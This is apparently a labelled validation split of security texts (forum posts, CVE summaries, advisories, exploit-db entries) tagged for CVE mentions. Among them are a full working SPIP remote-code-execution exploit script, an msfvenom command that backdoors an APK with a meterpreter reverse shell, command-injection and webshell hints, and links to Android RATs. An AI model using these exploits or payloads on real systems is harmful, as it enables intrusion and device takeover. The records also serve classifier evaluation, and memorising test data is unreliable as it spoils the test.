+{"id": "a010208c6a153e51b995", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-09-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "023c252a6b35cbf3fd6b", "text": "[Heap Overflow] CVE-2023-38545: socks5 heap buffer overflow\n\n# Summary:\n\nThe SOCKS5 state machine can be manipulated by a remote attacker to overflow heap memory if four conditions are met:\n\n1. The request is made via socks5h.\n2. The state machine's negotiation buffer is smaller than ~65k.\n3. The SOCKS server's \"hello\" reply is delayed.\n4. The attacker sets a final destination hostname larger than the negotiation\nbuffer.\n\nlibcurl is supposed to disable SOCKS5 remote hostname resolution for hostnames larger than 255 but will not due to a state machine bug.\n\nFor example tor user running libcurl app with follow location that connects to rogue onion server that replies with payload in `Location:` header which causes crash or worse.\n\n# Walkthrough:\n\n`do_SOCKS` initializes local variable `socks5_resolve_local` depending on the `CURLPROXY_` name. There are two relevant names for this state machine:\n\n- `CURLPROXY_SOCKS5` (SOCKS5 with local resolve of dest host)\n- `CURLPROXY_SOCKS5_HOSTNAME` (SOCKS5 with remote resolve of dest host)\n\n[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L573-L574)\n~~~c\n bool socks5_resolve_local =\n (conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;\n~~~\n\nFor this scenario, `CURLPROXY_SOCKS5_HOSTNAME` is the name and `socks5_resolve_local` is initialized FALSE.\n\nThe `do_SOCKS` state machine is entered for the first time for the connection. `sx->state` is `CONNECT_SOCKS_INIT` (which happens to be the first label). In that state the hostname length is checked and if too long to resolve remotely (>255) then it sets `socks5_resolve_local` to TRUE.\n\n[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L588-L593)\n~~~c\n /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */\n if(!socks5_resolve_local && hostname_len > 255) {\n infof(data, \"SOCKS5: server resolving disabled for hostnames of \"\n \"length > 255 [actual len=%zu]\", hostname_len);\n socks5_resolve_local = TRUE;\n }\n~~~\n\nThe local variable `socks5_resolve_local` is changed but, because this is a state machine, subsequent calls to `do_SOCKS` are in a different state and do not make the same change. ==**This is the bug.**==\n\nFor this scenario, the hostname is longer than 255 characters and `do_SOCKS` is on a subsequent call, which means `socks5_resolve_local` remains FALSE. This can happen by chance or be forced by an attacker.\n\nThe client \"hello\" SOCKS packet contains available methods and is sent to the server. State `CONNECT_SOCKS_READ_INIT` => `CONNECT_SOCKS_READ` is entered to parse the server \"hello\" packet (method selection reply). The server has not yet replied so `do_SOCKS` returns `CURLPX_OK`.\n\n[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L640-L662)\n~~~c\nCONNECT_SOCKS_READ_INIT:\n case CONNECT_SOCKS_READ_INIT:\n sx->outstanding = 2; /* expect two bytes */\n sx->outp = socksreq; /* store it here */\n /* FALLTHROUGH */\n case CONNECT_SOCKS_READ:\n presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT,\n \"initial SOCKS5 response\");\n if(CURLPX_OK != presult)\n return presult;\n else if(sx->outstanding) {\n /* remain in reading state */\n return CURLPX_OK;\n }\n else if(socksreq[0] != 5) {\n failf(data, \"Received invalid version in initial SOCKS5 response.\");\n return CURLPX_BAD_VERSION;\n }\n else if(socksreq[1] == 0) {\n /* DONE! No authentication needed. Send request. */\n sxstate(sx, data, CONNECT_REQ_INIT);\n goto CONNECT_REQ_INIT;\n }\n~~~\n\nOn a subsequent call `do_SOCKS` is in the same state where it's waiting for the initial server reply. If the reply is valid, and in this scenario it is, then the state machine will goto `CONNECT_REQ_INIT` which will goto `CONNECT_RESOLVE_REMOTE` since `socks5_resolve_local` is FALSE.\n\n[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L781-L797)\n~~~c\nCONNECT_REQ_INIT:\n case CONNECT_REQ_INIT:\n if(socks5_resolve_local) {\n enum resolve_t rc = Curl_resolv(data, sx->hostname, sx->remote_port", "source": "hackerone", "timestamp": "2023-10-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "61d63fd4d5e14e7762e5", "text": "If you are very beginner then Try Tryhackme . Here you will find a much more constructive guideline. Besides learning you should practice A LOT. Play CTF time to time. You will learn much faster by playing ctf, reading writeups, watching tutorials. Best wishes.", "source": "parrotsec", "timestamp": "2022-03-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9f23f995c0ad08d30db2", "text": "CVE: CVE-2022-24746\n\n[{'lang': 'en', 'value': 'Shopware is an open commerce platform based on the Symfony php Framework and the Vue javascript framework. In affected versions it is possible to inject code via the voucher code form. This issue has been patched in version 6.4.8.1. There are no known workarounds for this issue.'}]\n\nFix commit: NEXT-19276 - Add filtering to promotion and product codes", "source": "cvefixes", "timestamp": "2022-03-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2efc8c469861e581812e", "text": "When I am trying to dnsemum a server I keep getting query timed out. The script I am running is $ dnsenum --dnsserver 127.0.0.1 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt ns.inlanefreight.htb I’m clearly doing something wrong but I cannot seem to figure it out can anyone please support? Simple step by step would be great as Iam Neurodiverse and reading between the lines isn’t a strength of mine haha", "source": "hackthebox", "timestamp": "2023-03-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "de0af3723f4430b2a86a", "text": "How I spot I've been backdoored.\n\nFrom some days I was testing some free rats/obfuscators from github on my main host. I am not sure if I’ve been backdoored. Is there any way to check that. As I really setup my parrot for couple of days and don’t want to install it fresh again. Sometimes when I am out of my PC I can hear a noise from windmill.", "source": "parrotsec", "timestamp": "2022-02-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9b0273934c692e2de220", "text": "msfconsole not importing new custom private modules into the db\n\nAfter following every importation steps from the rapid7 doc correctly msfconsole is still not importing my private modules into the database. The steps I am taking are mkdir -p /root/.msf4/modules/exploits/name/name then I copy with cp -r my code from the dir where it is and after that I ran updatedb.", "source": "hackersploit", "timestamp": "2023-01-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4a2bd3e8a7b8bac139ce", "text": "CVE: CVE-2022-31081\n\n[{'lang': 'en', 'value': \"HTTP::Daemon is a simple http server class written in perl. Versions prior to 6.15 are subject to a vulnerability which could potentially be exploited to gain privileged access to APIs or poison intermediate caches. It is uncertain how large the risks are, most Perl based applications are served on top of Nginx or Apache, not on the `HTTP::Daemon`. This library is commonly used for local development and tests. Users are advised to update to resolve this issue. Users unable to upgrade may add additional request handling logic as a mitigation. After calling `my $rqst = $conn->get_request()` one could inspect the returned `HTTP::Request` object. Querying the 'Content-Length' (`my $cl = $rqst->header('Content-Length')`) will show any abnormalities that should be dealt with by a `400` response. Expected strings of 'Content-Length' SHOULD consist of either a single non-negative integer, or, a comma separated repetition of that number. (that is `42` or `42, 42, 42`). Anything else MUST be rejected.\"}]\n\nFix commit: Fix Content-Length ', '-separated string issues\n\nAfter a security issue, we ensure we comply to\nRFC-7230 -- HTTP/1.1 Message Syntax and Routing\n- section 3.3.2 -- Content-Length\n- section 3.3.3 -- Message Body Length", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ffc6bafb381a143acfb7", "text": "Click on avatar, next find and click on preferences, [this normally will open your account details] if not click on account. Next to your username should be a pencil symbol, click on this to edit your username.", "source": "parrotsec", "timestamp": "2023-08-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b4adc67934ae7ab3f8cd", "text": "SPIP v4.2.0 - Remote Code Execution (Unauthenticated)\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated)\n# Google Dork: inurl:\"/spip.php?page=login\"\n# Date: 19/06/2023\n# Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372)\n# Vendor Homepage: https://www.spip.net/\n# Software Link: https://files.spip.net/spip/archives/\n# Version: < 4.2.1 (Except few fixed versions indicated in the description)\n# Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0\n# CVE reference : CVE-2023-27372 (coiffeur)\n# CVSS : 9.8 (Critical)\n#\n# Vulnerability Description:\n#\n# SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.\n# This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.\n#\n# Usage: python3 CVE-2023-27372.py http://example.com\n\nimport argparse\nimport bs4\nimport html\nimport requests\n\ndef parseArgs():\n parser = argparse.ArgumentParser(description=\"Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7\")\n parser.add_argument(\"-u\", \"--url\", default=None, required=True, help=\"SPIP application base URL\")\n parser.add_argument(\"-c\", \"--command\", default=None, required=True, help=\"Command to execute\")\n parser.add_argument(\"-v\", \"--verbose\", default=False, action=\"store_true\", help=\"Verbose mode. (default: False)\")\n return parser.parse_args()\n\ndef get_anticsrf(url):\n r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10)\n soup = bs4.BeautifulSoup(r.text, 'html.parser')\n csrf_input = soup.find('input', {'name': 'formulaire_action_args'})\n if csrf_input:\n csrf_value = csrf_input['value']\n if options.verbose:\n print(\"[+] Anti-CSRF token found : %s\" % csrf_value)\n return csrf_value\n else:\n print(\"[-] Unable to find Anti-CSRF token\")\n return -1\n\ndef send_payload(url, payload):\n data = {\n \"page\": \"spip_pass\",\n \"formulaire_action\": \"oubli\",\n \"formulaire_action_args\": csrf,\n \"oubli\": payload\n }\n r = requests.post('%s/spip.php?page=spip_pass' % url, data=data)\n if options.verbose:\n print(\"[+] Execute this payload : %s\" % payload)\n return 0\n\nif __name__ == '__main__':\n options = parseArgs()\n\n requests.packages.urllib3.disable_warnings()\n requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'\n try:\n requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'\n except AttributeError:\n pass\n\n csrf = get_anticsrf(url=options.url)\n send_payload(url=options.url, payload=\"s:%s:\\\"\\\";\" % (20 + len(options.command), options.command))", "source": "exploitdb", "timestamp": "2023-06-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9f5d1c250d1e1b9fc944", "text": "if you run ‘apt list --installed’ first line of output is ‘Listing… Done’ so you need to exclude that line. To get the correct answer command should be ‘apt list --installed | grep “installed” | wc -l’ this will exclude the first line of the output.", "source": "hackthebox", "timestamp": "2023-03-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "371cebf51e0b299efc98", "text": "OffSec Metasploit Unleashed - Free Online Ethical Hacking Course Metasploit Unleashed (MSFU) is a Free Online Ethical Hacking Course by Offensive Security, which benefits Hackers for Charity. Learn how to use Metasploit. Est. reading time: 1 minute", "source": "parrotsec", "timestamp": "2023-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "628965d7b308c6d9fa1f", "text": "It’s awesome that you’re diving into the world of Penetration Testing and tackling those CTF challenges. They can be mind-bending, right?", "source": "hackthebox", "timestamp": "2023-10-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3e8276111e7f883a5c94", "text": "palak231 said: ↑ Hi this is Palak Sharma. I have completed my engineering and lots of programming languages I learn from here. Python is also my favorite programming language however it was not part of our syllabus but I learn little bit about Python Programming Language from internet. Now I want to enhance my skills and my coding in this programming language, can anyone suggest some best online courses for learning Python Programming Language. Waiting for some positive responses. Thanks Click to expand...", "source": "go4expert", "timestamp": "2023-03-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a9e93120522935c30a3c", "text": "CVE: CVE-2022-1346\n\n[{'lang': 'en', 'value': \"Multiple Stored XSS in GitHub repository causefx/organizr prior to 2.1.1810. This allows attackers to execute malicious scripts in the user's browser and it can lead to session hijacking, sensitive data exposure, and worse.\"}]\n\nFix commit: added sanitizeUserString and sanitizeEmail functions\nadded sanitize to uploaded image names\nadded sanitize to tabs, categories, users and bookmarks\nremoved svg files from approved image lists", "source": "cvefixes", "timestamp": "2022-04-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ba977310988c2823d341", "text": "CVE: CVE-2022-1785\n\n[{'lang': 'en', 'value': 'Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.4977.'}]\n\nFix commit: patch 8.2.4977: memory access error when substitute expression changes window\n\nProblem: Memory access error when substitute expression changes window.\nSolution: Disallow changing window in substitute expression.", "source": "cvefixes", "timestamp": "2022-05-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "76dbd80f360012951cc1", "text": "You’re almost there. You don’t really need the part after the base64 code (%26from=51459716.txt%26finish=1%26move=1 After to= the encoding is incorrect. Try %7c***bash<<< instead. (Replace *** with the encoded characters). You don’t have to encode <<< either.", "source": "hackthebox", "timestamp": "2023-10-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7d5f8135a4975384b6c0", "text": "\"catalog's registry v2 api exposed on unauthenticated path in Harbor\"\n\n[Severity: MEDIUM]\n\n### **Impact**\nJavier Provecho, member of the TCCT (Telefonica Cloud & Cybersecurity Tech better known as ElevenPaths) SRE team discovered a vulnerability regarding Harbor’s v2 API.\n\nThe catalog’s registry v2 api is exposed on an unauthenticated path. The current catalog API path is served at the following path and it requires to be authenticated as an admin.\n\n\"GET /v2/_catalog\"\n\nHowever, the authorization can be bypassed by using the following path\n\n\"GET /v2/_catalog/\"\n\n### **Patches**\nIf your product uses the affected releases of Harbor, update to either version v2.1.2 or v2.0.5 to fix this issue immediately\n\nhttps://github.com/goharbor/harbor/releases/tag/v2.1.2\nhttps://github.com/goharbor/harbor/releases/tag/v2.0.5\n\n### **Workarounds**\nIf you cannot access a patched release, it can be mitigated by disabling that API. For example, redirecting it to a 404 sink hole in the ingress.\n\n### **For more information**\nIf you have any questions or comments about this advisory, contact cncf-harbor-security@lists.cncf.io\nView our security policy at https://github.com/goharbor/harbor/security/policy\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29662", "source": "github_advisory", "timestamp": "2022-02-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "67536fe37b6a0c1845ac", "text": "jsx-slack insufficient patch for CVE-2021-43838 ReDoS\n\n[Severity: MEDIUM]\n\nWe found the patch for CVE-2021-43838 in jsx-slack v4.5.1 is insufficient to save from Regular Expression Denial of Service (ReDoS) attack.\n\nThis vulnerability affects to jsx-slack v4.5.1 and earlier versions.\n\n### Impact\n\nIf attacker can put a lot of JSX elements into `
    ` tag _with including multibyte characters_, an internal regular expression for escaping characters may consume an excessive amount of computing resources.\n\n```javascript\n/** @jsxImportSource jsx-slack */\nimport { Section } from 'jsx-slack'\n\nconsole.log(\n
    \n
    \n {[...Array(40)].map(() => (\n

    \n ))}\n
    \n
    \n)\n```\n\nv4.5.1 has released by passing the test against ASCII characters but missed the case of multibyte characters.\nhttps://github.com/yhatt/jsx-slack/security/advisories/GHSA-55xv-f85c-248q\n\n### Patches\n\njsx-slack v4.5.2 has updated regular expressions for escaping blockquote characters to prevent catastrophic backtracking. It is also including an updated test case to confirm rendering multiple tags in `
    ` with multibyte characters.\n\n### References\n\n- https://github.com/yhatt/jsx-slack/commit/46bc88391d89d5fda4ce689e18ca080bcdd29ecc\n\n### Credits\n\nThanks to @hieki for finding out this vulnerability.", "source": "github_advisory", "timestamp": "2022-01-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6578effa3236ad470af9", "text": "CVE: CVE-2021-43860\n\n[{'lang': 'en', 'value': 'Flatpak is a Linux application sandboxing and distribution framework. Prior to versions 1.12.3 and 1.10.6, Flatpak doesn\\'t properly validate that the permissions displayed to the user for an app at install time match the actual permissions granted to the app at runtime, in the case that there\\'s a null byte in the metadata file of an app. Therefore apps can grant themselves permissions without the consent of the user. Flatpak shows permissions to the user during install by reading them from the \"xa.metadata\" key in the commit metadata. This cannot contain a null terminator, because it is an untrusted GVariant. Flatpak compares these permissions to the *actual* metadata, from the \"metadata\" file to ensure it wasn\\'t lied to. However, the actual metadata contents are loaded in several places where they are read as simple C-style strings. That means that, if the metadata file includes a null terminator, only the content of the file from *before* the terminator gets compared to xa.metadata. Thus, any permissions that appear in the metadata file after a null terminator are applied at runtime but not shown to the user. So maliciously crafted apps can give themselves hidden permissions. Users who have Flatpaks installed from untrusted sources are at risk in case the Flatpak has a maliciously crafted metadata file, either initially or in an update. This issue is patched in versions 1.12.3 and 1.10.6. As a workaround, users can manually check the permissions of installed apps by checking the metadata file or the xa.metadata key on the commit metadata.'}]\n\nFix commit: Ensure that bundles have metadata on install\n\nIf we have a bundle without metadata we wouldn't properly present\nthe permissions in the transaction.", "source": "cvefixes", "timestamp": "2022-01-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2d46ff91ea3d2b11b3a5", "text": "CVE: CVE-2022-24738\n\n[{'lang': 'en', 'value': 'Evmos is the Ethereum Virtual Machine (EVM) Hub on the Cosmos Network. In versions of evmos prior to 2.0.1 attackers are able to drain unclaimed funds from user addresses. To do this an attacker must create a new chain which does not enforce signature verification and connects it to the target evmos instance. The attacker can use this joined chain to transfer unclaimed funds. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix commit: Merge pull request from GHSA-5jgq-x857-p8xw\n\n* fix: only enable claims from authorized channels\n\n* changelog\n\n* changelog 2\n\n* fix tests\n\n* rename to authorized\n\n* update forks\n\n* upgrade height\n\n* check for EVM chains\n\n* bonded ration adjustment\n\n* update genesis\n\n* fixes\n\n* swagger", "source": "cvefixes", "timestamp": "2022-03-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e7ac0297e7bf36010efc", "text": "Solved it. Just needed to specify ‘warfiles’ directory inside the archive, that was created by the script, like: /cmd/warfiles/cmd.jsp?cmd=id", "source": "hackthebox", "timestamp": "2023-11-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bb4ba53b0ea25ee7aa83", "text": "CVE: CVE-2022-2264\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.'}]\n\nFix commit: patch 9.0.0011: reading beyond the end of the line with put command\n\nProblem: Reading beyond the end of the line with put command.\nSolution: Adjust the end mark position.", "source": "cvefixes", "timestamp": "2022-07-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "bd619df7ee4629311e51", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8465, CVE-2018-8466, CVE-2018-8467.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "336fa1d2683eef9b85f0", "text": "hello evryone as mentioned above by others is better to use echo $var | wc -c using the length count gives and error.hopefully your code is also well written", "source": "hackthebox", "timestamp": "2022-09-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ceee61a623e85401a3cf", "text": "Input key\n\nWhite joining the event it is asking me input key, where am I supposed to get it?", "source": "hackthebox", "timestamp": "2023-03-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bcc8ac641fd9dd1baf7c", "text": "CVE: CVE-2022-23577\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `GetInitOp` is vulnerable to a crash caused by dereferencing a null pointer. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Prevent null dereference read in `GetInitOp`.\n\nWe have a map of maps. We test that the key exists in the first map but then we don't have any validation that this also means the second map has the needed key. In the scenarios where this is not the case, we'll dereference a nullptr, if we don't have this check\n\nPiperOrigin-RevId: 408739325\nChange-Id: If9bb7ed759aba1f3b56a34913f209508dbaf65ce", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f21bd74f8576666021ae", "text": "CVE: CVE-2022-29201\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.QuantizedConv2D` does not fully validate the input arguments. In this case, references get bound to `nullptr` for each argument that is empty. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix undefined behavior in QuantizedConv2D\n\nAdded more input validation and tests. Prior to this, we could get\n`nullptr` exceptions when attempting to access 0th elements of 0-sized\ninputs, leading to security vulnerability bugs.\n\nAlso needed to modify `quantized_conv_ops_test.cc` for consistency.\nPreviously the CPU kernel did technically support passing tensors\nof rank larger than 0 for min/max values. However, the XLA kernels do not.\n\nPiperOrigin-RevId: 445518507", "source": "cvefixes", "timestamp": "2022-05-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0ec3273b4dc75d1a64cd", "text": "CVE: CVE-2022-23589\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. Under certain scenarios, Grappler component of TensorFlow can trigger a null pointer dereference. There are 2 places where this can occur, for the same malicious alteration of a `SavedModel` file (fixing the first one would trigger the same dereference in the second place). First, during constant folding, the `GraphDef` might not have the required nodes for the binary operation. If a node is missing, the correposning `mul_*child` would be null, and the dereference in the subsequent line would be incorrect. We have a similar issue during `IsIdentityConsumingSwitch`. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Prevent null pointer dereference in `mutable_graph_view`\n\nPiperOrigin-RevId: 409684472\nChange-Id: I577eb9d9ac470fcec0501423171e739a4ec0cb5c", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "fd7cc52a6b3535b251b7", "text": "that’s still a bruteforce unless you did it without using the script but even entering them 1 by one is just manual bruteforce?", "source": "hackthebox", "timestamp": "2022-07-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "299f372938887001eb0a", "text": "apktool error after installing openjdk version 8 and recompiling it\n\nmsfvenom -x /home/drevello/Desktop/apks/MX.apk -p android/meterpreter/reverse_tcp LHOST=192.168.42.65 LPORT=19999 R >bind.apk Using APK template: /home/drevello/Desktop/apks/MX.apk [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload [ ] Creating signing key and keystore… [ ] Decompiling original APK… [ ] Decompiling payload APK… [ ] Locating hook point… [ ] Adding payload as package com.mixplorer.qnevh [ ] Loading /tmp/d20230202-3624-16hk09k/original/smali/com/mixplorer/AppImpl.smali and injecting payload… [ ] Poisoning the manifest with meterpreter permissions… [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Adding [ ] Rebuilding apk with meterpreter injection as /tmp/d20230202-3624-16hk09k/output.apk [-] I: Using Apktool 2.5.0-dirty I: Checking whether sources has changed… I: Smaling smali folder into classes.dex… Exception in thread “main” java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuffer; at org.jf.dexlib2.writer.DexWriter.writeAnnotationDirectories(DexWriter.java:919) at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:344) at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:300) at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61) at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:36) at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:420) at brut.androlib.Androlib.buildSources(Androlib.java:351) at brut.androlib.Androlib.build(Androlib.java:303) at brut.androlib.Androlib.build(Androlib.java:270) at brut.apktool.Main.cmdBuild(Main.java:259) at brut.apktool.Main.main(Main.java:85) Error: apktool execution failed i was using apkbinder script it uses apktool to bind payload and original app and i got this error my hardware and software info: OS: Parrot OS 5.1 (Electro Ara) x86_6 Kernel: 6.0.0-12parrot1-amd64 Uptime: 46 mins Packages: 3259 (dpkg) Shell: bash 5.1.4 Resolution: 1440x900 WM: Metacity (Marco) Theme: ARK-Dark [GTK2/3] Icons: ara [GTK2/3] Terminal: mate-terminal CPU: AMD A6-7480 Radeon R5 2C+6G (2) GPU: AMD ATI Radeon R5/R6/R7 Graphics Memory: 1564MiB / 7399MiB apktool Apktool v2.5.0-dirty - a tool for reengineering Android apk files with smali v2.4.0-debian and baksmali v2.4.0-debian metasploit Framework Version: 6.2.32-dev anyone has solutions", "source": "parrotsec", "timestamp": "2023-02-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5f202d0bc65e11c6f873", "text": "if anyone is stuck on how to get the flag when you got RCE, remember that you cant use LFI if you dont know the path of your target. in other words once you got RCE find the file you need then you can access it with LFI", "source": "hackthebox", "timestamp": "2023-01-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "96e0e2be46b27f73980b", "text": "OpenVas Installation\n\nHi, I am using parrot os version 5.0 (Electro Ara) 64-bit and I am facing problems using preinstalled openvas.When I run gvm-check-setup it shows following error gvm-check-setup 21.4.3 Test completeness and readiness of GVM-21.4.3 Step 1: Checking OpenVAS (Scanner)… ERROR: No OpenVAS Scanner found. FIX: Please install OpenVAS Scanner. ERROR: Your GVM-21.4.3 installation is not yet complete! Please follow the instructions marked with FIX above and run this script again. Could someone help me fix this error.", "source": "hackersploit", "timestamp": "2022-06-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4147a923e75cb66f5bd3", "text": "Try harder\n\nSomeone here tried to get ip by VOIP, gotta know this is a VOIP nr he used from Minnesota while Parrot.org is not there and they would never call me. Additionally I use alias non existant VOIP nr’s and mails. In regard of that further analysis will follow up on that PoS… Screenshot at 2023-11-30 01-53-31 890×816 28.5 KB", "source": "parrotsec", "timestamp": "2023-11-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "953d2068f0cb68fc423a", "text": "Prototype Pollution in set-in\n\n[Severity: CRITICAL]\n\nThe package set-in before 2.0.3 is vulnerable to Prototype Pollution via the `setIn` method, as it allows an attacker to merge object prototypes into it. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-28273](https://security.snyk.io/vuln/SNYK-JS-SETIN-1048049)", "source": "github_advisory", "timestamp": "2022-03-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "22d3e709504dd81ff4a7", "text": "[Unknown] Electron CVE-2022-35954 Delimiter Injection Vulnerability in exportVariable\n\n## Describe the summary:\nThe Electron Website provides a set of packages to make creating actions easier. The `core.exportVariable` function uses a well known delimiter that attackers can use to break out of that specific variable and assign values to other arbitrary variables. Workflows that write untrusted values to the `GITHUB_ENV` file may cause the path or other environment variables to be modified without the intention of the workflow or action author. Users should upgrade to `@actions/core v1.9.1`. If you are unable to upgrade the `@actions/core` package, you can modify your action to ensure that any user input does not contain the delimiter `_GitHubActionsFileCommandDelimeter_` before calling `core.exportVariable`.\n\n## Impact\n\n[CVE-2022-35954](https://afaghhosting.net/blog/cve-2022-35954/)\nCWE-74\nCWE-77\nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "source": "hackerone", "timestamp": "2022-12-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9e6ba1e9c0f9a14d54b6", "text": "You may like to have a look at these open-source RAT packages: GitHub GitHub - AhMyth/AhMyth-Android-RAT: Android Remote Administration Tool Android Remote Administration Tool. Contribute to AhMyth/AhMyth-Android-RAT development by creating an account on GitHub. GitHub GitHub - screetsec/TheFatRat: Thefatrat a massive exploiting tool : Easy tool... Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and th... Kali Linux Tutorials – 22 Mar 21 Rafel Rat : Android Rat Written In Java!Kalilinuxtutorials Rafel is Remote Access Tool Used to Control Victims Using WebPanel With More Advance Features. Main Features Admin Permission Add App To White List Looks Like Browser Runs In Background Even App is Closed(May not work on some Devices) Accessibility... Est. reading time: 1 minute", "source": "parrotsec", "timestamp": "2022-01-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c6a342e0e5c0b3e5a879", "text": "Hello, “Skills Assessment - Service Login” is connected with “Skills Assessment - Website”. So, the username is what you think. Furthermore, try to follow the hint of only use the first name (Ha***) to create password, use seed to only keep passwords which are compliant with the policy, and create the usernames with UsernameGenerator (here use fullname Ha*** Po****).", "source": "hackthebox", "timestamp": "2022-04-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b8fb0a488f52a9b1febf", "text": "Xerte 3.10.3 - Directory Traversal (Authenticated)\n\n# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)\n# Date: 05/03/2021\n# Exploit Author: Rik Lutz\n# Vendor 